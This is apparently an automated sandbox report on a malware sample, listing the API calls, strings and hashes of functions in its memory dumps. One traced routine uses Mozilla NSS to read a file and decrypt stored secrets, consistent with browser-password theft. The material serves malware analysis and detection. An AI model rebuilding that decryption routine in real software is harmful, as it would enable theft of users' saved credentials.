Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007CD
Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007D6
Part of subcall function 6C3007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C29204A), ref: 6C3007E4
Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,6C29204A), ref: 6C300864
Part of subcall function 6C3007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C300880
Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,6C29204A), ref: 6C3008CB
Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(?,?,6C29204A), ref: 6C3008D7
Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(?,?,6C29204A), ref: 6C3008FB

TlsGetValue.KERNEL32 ref: 6C354DD7
EnterCriticalSection.KERNEL32(?), ref: 6C354DEC
PR_Unlock.NSS3(?), ref: 6C354E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C354E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C354E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C354E71
free.MOZGLUE(00000000), ref: 6C354E7A
PR_Unlock.NSS3(?), ref: 6C354EA2
TlsGetValue.KERNEL32 ref: 6C354EC1
EnterCriticalSection.KERNEL32(?), ref: 6C354ED6
PR_Unlock.NSS3(?), ref: 6C354F01
free.MOZGLUE(00000000), ref: 6C354F2A

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: c980e01502ef26a5d0a5f8d217a15c8291f3d1be372b09fcb7e54c63efdca4d8
Instruction ID: 50931252828927a7876b8f4662c1137f1a74f56ee939cc6fc593657e1f84f9b2
Opcode Fuzzy Hash: c980e01502ef26a5d0a5f8d217a15c8291f3d1be372b09fcb7e54c63efdca4d8
Instruction Fuzzy Hash: 46B1F271A002059FDF05EF68D844AAA77B4BF09318F844128EC0597B11E736E974CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 6C31C4B0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C31C4D5

Part of subcall function 6C36BE30: SECOID_FindOID_Util.NSS3(6C32311B,00000000,?,6C32311B,?), ref: 6C36BE44

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C31C516
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C31C530
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C31C54E
NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6C31C5CB
VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6C31C712
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C31C725
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C31C742
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C31C751
PL_FinishArenaPool.NSS3(?), ref: 6C31C77A
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C31C78F
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C31C7A9

Strings

security, xrefs: 6C31C63F

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
String ID: security
API String ID: 1085474831-3315324353
Opcode ID: 684fad7cc8ab0c4e000eee47bff5c2834e5f91d86a0c47b9ccf9aed20ea8908b
Instruction ID: 38a3733b325e4ead9b5389f2331d7437337a63255f7afe2ca3847fa2afdf3761
Opcode Fuzzy Hash: 684fad7cc8ab0c4e000eee47bff5c2834e5f91d86a0c47b9ccf9aed20ea8908b
Instruction Fuzzy Hash: 02811871D08108AEEF18EA55EC81BEE7778EF0130CF284135ED05A6E51E762D959CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0040C100 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0040C112

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,040862C8,00000000,?,0041DBAC,00000000,?,?), ref: 0040C1D6
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C1F3
GetFileSize.KERNEL32(00000000,00000000), ref: 0040C1FF
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040C212

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040C242
StrStrA.SHLWAPI(?,04086298,0041D72E), ref: 0040C260
StrStrA.SHLWAPI(00000000,040862B0), ref: 0040C287
StrStrA.SHLWAPI(?,04086DB8,00000000,?,0041DBB8,00000000,?,00000000,00000000,?,04083868,00000000,?,0041DBB4,00000000,?), ref: 0040C405
StrStrA.SHLWAPI(00000000,04086E78), ref: 0040C41C

Part of subcall function 0040BF90: memset.MSVCRT ref: 0040BFC3
Part of subcall function 0040BF90: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,040839A8), ref: 0040BFE1
Part of subcall function 0040BF90: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
Part of subcall function 0040BF90: PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
Part of subcall function 0040BF90: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
Part of subcall function 0040BF90: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
Part of subcall function 0040BF90: memcpy.MSVCRT ref: 0040C082
Part of subcall function 0040BF90: PK11_FreeSlot.NSS3(?), ref: 0040C0D1

StrStrA.SHLWAPI(?,04086E78,00000000,?,0041DBBC,00000000,?,00000000,040839A8), ref: 0040C4BD
StrStrA.SHLWAPI(00000000,04083848), ref: 0040C4D4

Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8

lstrlen.KERNEL32(00000000), ref: 0040C5A7
CloseHandle.KERNEL32(00000000), ref: 0040C5F9
NSS_Shutdown.NSS3 ref: 0040C607

Strings

, xrefs: 0040C133

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmallocmemcpymemset
String ID:
API String ID: 2844179199-3916222277
Opcode ID: 44fef13302315162d7e32ba14433b518de5c58a6dfc62e842c65371e6c7da01b
Instruction ID: 16cc530deb27457f536659a64f134916331f5af867ee6c6bf2a367595298ef92
Opcode Fuzzy Hash: 44fef13302315162d7e32ba14433b518de5c58a6dfc62e842c65371e6c7da01b
Instruction Fuzzy Hash: 66E11075910208ABCB14EBA1DC91FEEBB79BF54304F41415EF10667191DF38AA86CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6C344CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C344CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C344D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C344D37

Part of subcall function 6C42D930: PL_strncpyz.NSS3(?,?,?), ref: 6C42D963

PR_LogPrint.NSS3(?,00000000), ref: 6C344D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C344D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C344D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C344DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C344DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C344E20

Strings

(CK_INVALID_HANDLE), xrefs: 6C344D30, 6C344D83
hSession = 0x%x, xrefs: 6C344D12, 6C344D22
C_GetObjectSize, xrefs: 6C344CEE
hObject = 0x%x, xrefs: 6C344D65, 6C344D75
pulSize = 0x%p, xrefs: 6C344DB7
*pulSize = 0x%x, xrefs: 6C344E1B
nBl, xrefs: 6C344DD4, 6C344DFF

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$nBl
API String ID: 1003633598-2883561553
Opcode ID: 36d6afb345613fffff47e33c333282940fc08f13e4543b96cc703e8983ef307f
Instruction ID: 319f92059b89ddc4533ede9c399b418d9793e68b278f506a9f1f9add38bba1af
Opcode Fuzzy Hash: 36d6afb345613fffff47e33c333282940fc08f13e4543b96cc703e8983ef307f
Instruction Fuzzy Hash: 9341B171601164EFDB01EF14DD89F6A37F5EB4631DF048039E908ABA12DB359948DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C3DCD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C3DCC7B), ref: 6C3DCD7A

Part of subcall function 6C3DCE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C34C1A8,?), ref: 6C3DCE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C3DCDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C3DCDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C3DCDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C3DCD8E

Part of subcall function 6C3005C0: PR_EnterMonitor.NSS3 ref: 6C3005D1
Part of subcall function 6C3005C0: PR_ExitMonitor.NSS3 ref: 6C3005EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C3DCDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C3DCDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C3DCE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C3DCE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C3DCE48

Strings

getaddrinfo, xrefs: 6C3DCD88, 6C3DCDF9
wship6.dll, xrefs: 6C3DCDE3
getnameinfo, xrefs: 6C3DCDB2, 6C3DCE23
freeaddrinfo, xrefs: 6C3DCD9F, 6C3DCE10
ws2_32.dll, xrefs: 6C3DCD75

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: c77c440a789affd6ef1691655a0579104ad42db0636b98992932538a0eb8820c
Instruction ID: 3629783bd9bbaca416a5c889bb6d85ebb8e6fd0c06d9d5757823e34950aa5750
Opcode Fuzzy Hash: c77c440a789affd6ef1691655a0579104ad42db0636b98992932538a0eb8820c
Instruction Fuzzy Hash: F111A2E7E2266197EB02FE753C51D9E2A58AB1210DB294534D80992E41FB21D50C8EF3

Uniqueness

Uniqueness Score: -1.00%

Function 6C380C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,8l), ref: 6C380C81

Part of subcall function 6C36BE30: SECOID_FindOID_Util.NSS3(6C32311B,00000000,?,6C32311B,?), ref: 6C36BE44

Part of subcall function 6C358500: SECOID_GetAlgorithmTag_Util.NSS3(6C3595DC,00000000,00000000,00000000,?,6C3595DC,00000000,00000000,?,6C337F4A,00000000,?,00000000,00000000), ref: 6C358517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C380CC4

Part of subcall function 6C36FAB0: free.MOZGLUE(?,-00000001,?,?,6C30F673,00000000,00000000), ref: 6C36FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C380CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C380D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C380D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C380D7D
free.MOZGLUE(00000000), ref: 6C380DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C380DC1
free.MOZGLUE(00000000), ref: 6C380DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C380E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C380E0F

Part of subcall function 6C3595C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C337F4A,00000000,?,00000000,00000000), ref: 6C3595E0
Part of subcall function 6C3595C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C337F4A,00000000,?,00000000,00000000), ref: 6C3595F5
Part of subcall function 6C3595C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C359609
Part of subcall function 6C3595C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C35961D
Part of subcall function 6C3595C0: PK11_GetInternalSlot.NSS3 ref: 6C35970B
Part of subcall function 6C3595C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C359756
Part of subcall function 6C3595C0: PK11_GetIVLength.NSS3(?), ref: 6C359767
Part of subcall function 6C3595C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C35977E
Part of subcall function 6C3595C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C35978E

Strings

-$8l, xrefs: 6C380C64
*,8l, xrefs: 6C380DCC
*,8l, xrefs: 6C380C69, 6C380DE0, 6C380C80, 6C380C8B, 6C380CAF

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,8l$*,8l$-$8l
API String ID: 3136566230-3188397190
Opcode ID: d8cda2e3f7988818348f95d78c720c78c8c335d1f97c75bf51b51cc4a2792b29
Instruction ID: a47df658cc002b541cf62aef531d6db44a8b99d94d21468a0ced15d9ab66a528
Opcode Fuzzy Hash: d8cda2e3f7988818348f95d78c720c78c8c335d1f97c75bf51b51cc4a2792b29
Instruction Fuzzy Hash: C941C1B1902255ABEB009F65DC41BEF7678AF0430CF104128ED196BB41E736EA18CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 6C376CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C441DE0,?), ref: 6C376CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C376D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C376D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C376D82
DER_GetInteger_Util.NSS3(?), ref: 6C376DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C376DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C376E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C376F19
PK11_DigestBegin.NSS3(00000000), ref: 6C376F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C376F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C377011
PK11_FreeSymKey.NSS3(00000000), ref: 6C377033
free.MOZGLUE(?), ref: 6C37703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C377060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C377087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C3770AF

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: dfacc55f15267aaebb3a6db73dc1e59badb7009ddec818709fac97ddef14770b
Instruction ID: 949f8b332ccc3d317a1c8fd54b499e15e397cd79653c72e242a3a324f17baa43
Opcode Fuzzy Hash: dfacc55f15267aaebb3a6db73dc1e59badb7009ddec818709fac97ddef14770b
Instruction Fuzzy Hash: 40A109715142009BEB209B24DDA5BAA32B4DB8130CF244939E958DBF81E73ED859CF77

Uniqueness

Uniqueness Score: -1.00%

Function 6C332C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?3l,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332C62
EnterCriticalSection.KERNEL32(0000001C,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332C76
PL_HashTableLookup.NSS3(00000000,?,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332C93

Part of subcall function 6C3BDD70: TlsGetValue.KERNEL32 ref: 6C3BDD8C
Part of subcall function 6C3BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C3BDDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23), ref: 6C332CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C32E477,?,?,?,00000001,00000000,?), ref: 6C332CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C32E477,?,?,?,00000001,00000000,?), ref: 6C332D4D
EnterCriticalSection.KERNEL32(?), ref: 6C332D61
PL_HashTableLookup.NSS3(?,?), ref: 6C332D71
PR_Unlock.NSS3(?), ref: 6C332D7E

Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007AD
Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007CD
Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007D6
Part of subcall function 6C3007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C29204A), ref: 6C3007E4
Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,6C29204A), ref: 6C300864
Part of subcall function 6C3007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C300880
Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,6C29204A), ref: 6C3008CB
Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(?,?,6C29204A), ref: 6C3008D7
Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(?,?,6C29204A), ref: 6C3008FB

Strings

#?3l, xrefs: 6C332C43

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?3l
API String ID: 2446853827-211498274
Opcode ID: 7c876e03bd0621e29f036c279b9d98c87904b4f9729f54163d87bb2491cd2e63
Instruction ID: 2cf22c648fa116ad14653072845d4a243cfc492896d96df0b32dff47a6abc9f8
Opcode Fuzzy Hash: 7c876e03bd0621e29f036c279b9d98c87904b4f9729f54163d87bb2491cd2e63
Instruction Fuzzy Hash: 8751E5B6D00214ABDB01AF24DC459AA7778BF1925CB048524ED5C97B12E732ED64CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 0040FAE0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 145stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 0040FB05
ExitProcess.KERNEL32 ref: 0040FB11
strtok_s.MSVCRT ref: 0040FB28

Strings

block, xrefs: 0040FAF7

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 8259de89bfbde49ab53180d3e810b9deec6107944c9e036c38e8419895e02503
Instruction ID: 7825bcbe27da9618b603611e1cfecd621835b499ad6dca7fa43ef563d7fd58f0
Opcode Fuzzy Hash: 8259de89bfbde49ab53180d3e810b9deec6107944c9e036c38e8419895e02503
Instruction Fuzzy Hash: 0F514074A08209EFDB20DFA1D955BAE77B5BF44305F10807AE802B76C0D778E985CB59

Uniqueness

Uniqueness Score: -1.00%

Function 6C3EA4C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C3EA4E6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C3EA4F9
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3EA553
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C3EA5AC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3EA5F7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3EA60C
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3EA633
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3EA671
